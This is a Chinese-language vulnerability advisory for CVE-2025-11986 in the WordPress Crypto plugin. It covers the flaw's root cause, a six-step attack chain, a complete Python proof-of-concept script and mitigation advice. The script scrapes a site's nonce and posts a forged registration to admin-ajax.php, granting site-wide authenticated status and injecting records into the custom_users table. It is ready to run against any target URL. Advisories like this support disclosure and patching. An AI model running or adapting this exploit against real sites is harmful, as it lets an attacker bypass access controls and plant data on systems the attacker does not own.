CVE-2025-11986 WordPress Crypto插件未授权访问控制绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11986

漏洞类型

访问控制绕过/信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Crypto插件（版本<=2.22）

漏洞概述

WordPress Crypto插件是一款用于加密货币相关功能的WordPress插件。该插件在2.22及之前所有版本中存在严重的安全漏洞，源于其注册了一个未认证的AJAX动作（wp_ajax_nopriv_crypto_connect_ajax_process）。该端点允许攻击者调用register和savenft方法，仅需提供公开可用的nonce检查即可，无需任何钱包签名验证。攻击者利用此漏洞可以设置站点范围的全域认证状态，通过单个transient实现对所有访问者访问控制的完全绕过。此漏洞的影响范围包括：绕过[crypto-block]短代码限制、绕过页面级访问控制，影响持续约一小时。此外，攻击者还可以在插件的custom_users表中注入任意数据，可能导致用户数据泄露和进一步的恶意操作。由于无需认证即可利用此漏洞，因此任何互联网用户都可能成为潜在攻击者。

技术细节

该漏洞的根本原因在于Crypto插件的认证机制设计缺陷。插件通过wp_ajax_nopriv_crypto_connect_ajax_process注册了一个公开的AJAX端点，该端点对应class_crypto_connect_ajax_register.php中的register和savenft方法。具体问题包括：1) 端点仅依赖公开的nonce值进行验证，而非加密签名；2) 缺少钱包签名验证机制；3) 认证状态通过transient存储，可被攻击者操纵。攻击者发送请求时会触发savenft方法，该方法将数据存储到custom_users表中，同时设置一个全局认证状态的transient。这个transient的过期时间约为1小时，在此期间所有访问者都会被识别为已认证用户，从而绕过所有基于用户角色的访问控制。攻击者还可以利用此漏洞向custom_users表注入任意数据，包括伪造的用户记录或恶意内容。

攻击链分析

STEP 1

步骤1

攻击者访问目标WordPress站点，获取公开的nonce值（通过页面源码或API端点）

STEP 2

步骤2

攻击者构造恶意请求，发送到wp-admin/admin-ajax.php端点，指定action为crypto_connect_ajax_process，sub_action为register

STEP 3

步骤3

请求中包含伪造的钱包地址和签名数据，利用插件仅检查nonce但不验证签名完整性的缺陷

STEP 4

步骤4

插件处理请求，创建全局认证transient，将所有站点访问者标记为已认证状态，有效期约1小时

STEP 5

步骤5

攻击者同时利用savenft方法向custom_users表注入恶意数据（如伪造用户或恶意内容）

STEP 6

步骤6

在transient有效期内，所有访问者绕过[crypto-block]短代码限制和页面级访问控制，攻击者获得未授权访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 """ CVE-2025-11986 PoC - WordPress Crypto Plugin Unauthorized Access Control Bypass Note: This PoC is for educational and security testing purposes only. """ import requests import re import sys from urllib.parse import urljoin def get_nonce(target_url): """Extract nonce from the target WordPress site""" try: response = requests.get(target_url, timeout=10) # Look for wpCreateNonce or crypto-related nonces nonce_patterns = [ r'nonce\s*[=:]\s*["\']([a-zA-Z0-9]+)["\']', r'cryptoConnectNonce\s*[=:]\s*["\']([a-zA-Z0-9]+)["\']', r'ajaxnonce\s*[=:]\s*["\']([a-zA-Z0-9]+)["\']' ] content = response.text for pattern in nonce_patterns: match = re.search(pattern, content) if match: return match.group(1) return None except Exception as e: print(f"[-] Error fetching nonce: {e}") return None def exploit_crypto_plugin(target_url, nonce=None): """Send malicious request to bypass authentication""" endpoint = urljoin(target_url, '/wp-admin/admin-ajax.php') # Prepare the malicious payload data = { 'action': 'crypto_connect_ajax_process', 'sub_action': 'register', 'nonce': nonce or 'dummy', 'wallet_address': '0x' + 'A' * 40, 'signature': 'malicious_signature', 'email': '[email protected]', 'username': 'attacker_injected' } try: print(f"[*] Sending exploit request to {endpoint}") response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Response: {response.text[:500]}") return True else: print(f"[-] Request failed with status {response.status_code}") return False except Exception as e: print(f"[-] Error during exploitation: {e}") return False def main(): if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Target: {target}") print(f"[*] Extracting nonce...") nonce = get_nonce(target) if nonce: print(f"[+] Found nonce: {nonce}") else: print(f"[*] Using default nonce or proceeding without it") print(f"[*] Launching exploit...") exploit_crypto_plugin(target, nonce) if __name__ == '__main__': main()

影响范围

WordPress Crypto插件 < 2.22

防御指南

临时缓解措施

立即采取以下措施：1) 将Crypto插件升级到最新版本；2) 如果无法升级，在WordPress管理后台禁用该插件；3) 检查并清理custom_users表中的异常数据；4) 清除所有由插件创建的transient缓存；5) 审查所有用户账号，删除可疑账户；6) 启用WordPress安全插件的实时防护功能；7) 考虑使用WAF阻断针对admin-ajax.php的异常请求。